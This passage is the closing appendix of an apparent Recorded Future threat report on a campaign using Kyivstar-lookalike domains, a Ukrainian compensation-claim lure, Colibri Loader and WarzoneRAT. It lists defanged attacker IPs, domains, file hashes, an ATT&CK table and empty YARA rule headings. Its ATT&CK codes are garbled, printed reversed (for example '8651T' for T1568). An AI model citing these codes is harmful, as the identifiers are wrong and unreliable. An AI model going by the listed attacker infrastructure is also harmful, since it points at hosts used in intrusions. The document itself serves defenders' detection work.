Recorded Future Platform in your network monitoring, intrusion detection systems, firewalls, and any associated perimeter security appliances. ----- ##### Appendix A — Indicators ``` IP Addresses: ``` 103[.]150[.]187[.]121 ``` 103[.]27[.]202[.]127 ``` 217[.]77[.]221[.]199 31[.]7[.]58[.]82 65[.]108[.]213[.]210 91[.]200[.]114[.]141 94[.]153[.]171[.]42 94[.]158[.]156[.]4 ``` Domains: ``` account[.]adfs[.]kyivstar[.]online adfs[.]kyivstar[.]online darkett[.]ddns[.]net darkfox[.]ddns[.]net darksea[.]ddns[.]net ``` datagroup[.]ddns[.]net ett[.]ddns[.]net ett[.]hopto[.]org ``` kievstar[.]online kyiv-star[.]ddns[.]net kyivstar[.]online login[.]adfs[.]kyivstar[.]online login[.]kyivstar[.]online outlook[.]adfs[.]kyivstar[.]online ``` star-cz[.]ddns[.]net ``` star-link[.]ddns[.]net www[.]kyivstar[.]online ``` yugyuvyugguitgyuigtfyutdtoghghbbgyv[.]cx ``` zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc ``` Files and Hashes: ``` |Files and Hashes:|Col2| |---|---| |3_ЗАЯВА-на-отримання-компенсації.iso|1c6643b479614340097a8071c9f880688af5a82db7b6e755beafe7301eea1abf| |Documents:ApplicationData|44673a8ff098f12910c441c5697d27889dd1c5fd4aef875d4cf381227eac3a2b| |Get-Variable.exe|aa2d97b5be06be67ec04774ad681da6113ee2b4929c0539929bbac19926682c8| |MSCommonDriver.exe|44673a8ff098f12910c441c5697d27889dd1c5fd4aef875d4cf381227eac3a2b| |conhost.exe|aa2d97b5be06be67ec04774ad681da6113ee2b4929c0539929bbac19926682c8| |jfilyg7.exe|722c36abd195cce70ee25b48d6e64873262e046eae7433976120a1496f01487d| |programs.bat|98c9e85c013d0404e2c595958a77f4d1cafeb122efde9efc3a83a59b1233b58f| |programs.bat:start|ed8894af2c305e46c5fc8cdefa21e4535a601aa58d06d1beed17bb2c9e51b271| |ЗАЯВА-на-отримання-компенсації.lnk|bc4cab14e4b378a7b98185367b4778f92eb4335faba1a4503f4cfb7aba8f13e7| |ЗАЯВА/3_ЗАЯВА-на-отримання-компенсації-додаткової- знижки-сімям-загиблих2.doc|a5a20063c8699c66f5292ed1da7c860360baf6cf2a52f33c2c0b8873a995397c| ----- ##### Appendix B — Maltego Chart of Infrastructure and Files ----- ##### Appendix C — Mitre ATT&CK Techniques |Appendix C — Mitre ATT&CK Techniques|Col2| |---|---| |Tactic: Technique|ATT&CK Code| |Command and Control: Dynamic Resolution|8651T| |Command and Control: Non-Application Layer Protocol|5901T| |Command and Control: Web Service|2011T| |Defense Evasion: Hide Artifacts: Hidden Files and Directories|100.4651T| |Defense Evasion: Hide Artifacts: Hidden Window|300.4651T| |Defense Evasion: Hide Artifacts: NTFS File Attributes|400.4651T| |Defense Evasion: Obfuscated Files or Information: HTML Smuggling|600.7201T| |Defense Evasion: Process Injection: Process Hollowing|210.5501T| |Execution: Command and Scripting Interpreter: PowerShell|100.9501T| |Execution: Command Scripting Interpreter: Windows Command Shell|300.9501T| |Execution: User Execution|4021T| |Execution: Windows Management Instrumentation|7401T| |Persistence: H​ ijack Execution Flow: Path Interception by Search Order Hijacking|800.4751T| |Persistence: Registry Run Keys / Startup Folder|100.7451T| |Persistence: Scheduled Task|500.3501T| |Resource Development: Acquire Infrastructure|3851T| ----- ##### Appendix D — YARA Rules ###### MAL_Colibri_Loader.yar ----- ###### MAL_WarzoneRAT.yar ----- Data sources for this report include the Recorded Future® Platform, SecurityTrails, DomainTools, PolySwarm, Farsight, Shodan, BinaryEdge, Censys, Hatching Triage, and other open-source tools and techniques. About Insikt Group[®] Insikt Group is Recorded Future’s threat research division, comprising analysts and security researchers with deep government, law enforcement, military, and intelligence agency experience. Their mission is to produce intelligence on a range of cyber and geopolitical threats that reduces risk for clients, enables tangible outcomes, and prevents business disruption. Coverage areas include research on state-sponsored threat groups; financially-motivated threat actors on the darknet and criminal underground; newly emerging malware and attacker infrastructure; strategic geopolitics; and influence operations. About Recorded Future[®] Recorded Future is the world’s largest intelligence company. Recorded Future’s cloud-based Intelligence Platform provides the most complete coverage across adversaries, infrastructure, and targets. By combining persistent and pervasive automated data collection and analytics with human analysis, Recorded Future provides real-time visibility into the vast digital landscape and empowers clients to take proactive action to disrupt adversaries and keep their people, systems, and infrastructure safe. Headquartered in Boston with offices and employees around the world, Recorded Future works with more than 1,400 businesses and government organizations across more than 60 countries. Learn more at recordedfuture.com and follow us on Twitter at @RecordedFuture. -----